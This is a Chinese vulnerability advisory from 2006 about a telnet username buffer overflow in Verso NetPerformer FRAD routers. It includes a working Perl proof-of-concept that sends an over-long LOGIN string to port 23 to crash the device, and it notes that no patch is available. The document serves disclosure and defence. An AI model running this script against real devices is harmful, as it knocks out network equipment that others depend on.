发布日期：2006-09-13
更新日期：2006-09-14

受影响系统：

Verso Technologies NetPerformer FRAD ACT SDM-9500 series
Verso Technologies NetPerformer FRAD ACT SDM-9300 series
Verso Technologies NetPerformer FRAD ACT SDM-9200 series

描述：

---

BUGTRAQ  ID: 19989

Verso NetPerformer是基于SIP的语音和数据路由器，结合了数据路由器和语音网关的功能。

NetPerformer的telnet访问接口在处理用户名时存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞导致设备拒绝服务。

如果攻击者能够对NetPerformer帧中继访问设备（FRAD）的telnet服务传送超长用户名（大于4550字符）的话，就会触发缓冲区溢出，导致设备重启或执行任意指令。

<*来源：Arif Jatmoko （arif.jatmoko@sea.ccamatil.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=115816721617893&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

# __START_CODE
#
#!/usr/bin/perl

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "23",

Proto    => "TCP"))
{
                 print "Modhiar'000 ..... killing netperformer ... $ARGV[0]
port 23...";
                 sleep(1);
                 print $socket "LOGIN " . "A" x 4550 . "BCDE\r\n";
                 sleep(1);
                 print $socket "PASS " . "\r\n";
                 close($socket);
}
else
{
                 print "Cannot connect to $ARGV[0]:23\n";
}
# __END_CODE

建议：

---

厂商补丁：

Verso Technologies
------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.verso.com/enterprise/netperformer/index.asp

浏览次数：3103
严重程度：0（网友投票）